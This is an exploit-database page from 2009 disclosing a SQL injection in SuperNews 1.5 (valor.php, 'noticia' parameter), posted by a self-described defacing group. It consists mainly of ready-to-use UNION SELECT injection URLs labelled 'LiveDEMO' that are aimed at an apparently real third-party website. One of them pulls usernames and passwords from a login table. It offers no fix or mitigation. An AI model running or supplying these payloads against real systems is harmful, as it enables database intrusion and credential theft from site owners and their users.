[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : SuperNews 1.5 (valor.php noticia) SQL Injection Vulnerability
# Published : 2009-03-23
# Author : p3s0k!
# Previous Title : WBB3 rGallery 1.2.3 (UserGallery) Blind SQL Injection Exploit
# Next Title : X-BLC 0.2.0 (get_read.php section) SQL Injection Vulnerability
#############################################################
SuperNews 1.5 SQL Injection in valor.php
#############################################################
###################################################
#[~] Author : p3s0k!
#[~] Terminal Hacker Team
###################################################
Example:
http://www.avhsj.com.br/noticias/valor.php?noticia=[SQL-Injection]
LiveDEMO:
http://www.avhsj.com.br/noticias/valor.php?noticia=-1+union+select+0,1,2,database(),4,5--
http://www.avhsj.com.br/noticias/valor.php?noticia=-1+union+select+0,1,2,user,pass,5+from+login--
##############################
#[!] Terminal Hacker Defacers
#[!] www.TerminalHacker.es
##############################
# www.Syue.com [2009-03-23]